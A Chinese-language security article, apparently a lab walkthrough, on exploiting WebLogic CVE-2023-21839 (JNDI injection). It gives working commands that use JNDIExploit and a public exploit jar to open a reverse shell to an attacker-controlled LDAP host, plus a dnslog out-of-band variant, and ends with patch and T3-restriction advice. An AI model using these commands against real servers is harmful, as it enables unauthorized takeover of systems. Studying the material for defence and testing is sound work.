Weblogic-CVE-2023-21839 漏洞解析
2024-1-30 13:50:30 Author: www.freebuf.com(查看原文) 阅读量:31 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

RCE漏洞,该漏洞允许未经身份验证的远程,通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致Oracle WebLogic服务器被接管,通过rmi/ldap远程协议进行远程命令执行,,当 JDK 版本过低或本地存在小工具(javaSerializedData)时,可能导致远程代码执行。

由此可见:CVE-2023-21839是一个weblogic的JNDI注入漏洞。

Oracle WebLogic Server 12.2.1.3.0

Oracle WebLogic Server 12.2.1.4.0

Oracle WebLogic Server 14.1.1.0.0

反弹shell

一、启用http://your-ip:7001/console,可以看到登录界面

1702443149_6579388d089c73411c3f9.png!small?1702443150354

下载漏洞利用工具

JNDIExploit-1.4-SNAPSHOT.jar

二、启动ladp服务,在kali上同时启动监听:

1702443160_6579389833615944c36fe.png!small?1702443161247

vps上使用JNDIExploit开启ldap协议服务,这里注意 1389跟3456端口开放

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.111.14

1702443167_6579389f98ae7d95fabb0.png!small?1702443169115

漏洞EXP下载:

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

三、启动EXP(注意:jdk版本仍需低版本,原装JDK17不必卸载,下载一个低版本的JDK之后,切换即可)

java -jar Weblogic-CVE-2023-21839.jar 192.168.111.6:7001 ldap://192.168.111.14:1389/Basic/ReverseShell/192.168.111.14/9999

java -jar 目标服务器ip地址:端口 ldap地址/Basic/ReverseShell/ldap服务器IP地址/nc监听端口

没有明显的变化

1702443178_657938aadbc16b2a2308f.png!small?1702443179997

四、查看LDAP服务器,成功获取

1702443186_657938b2c207489509ffa.png!small?1702443188127

1702443194_657938ba84e2e821bd9f6.png!small?1702443195840

DNSlog流量外带

eg:java -jar Weblogic-CVE-2023-21839.jar 靶场ip:7001 ldap:// xxxxxx.dnslog.cn

java -jar Weblogic-CVE-2023-21839.jar 192.168.111.6:7001 ldap:// vqd5uu.dnslog.cn

1702443203_657938c30e1b969cb2650.png!small?1702443204276

还可以利用工具实现。。。。

下载最新补丁,链接:https://support.oracle.com/rs?type=doc&id=2917213.2
限制T3协议访问


文章来源: https://www.freebuf.com/articles/web/386448.html
如有侵权请联系:admin#unsafe.sh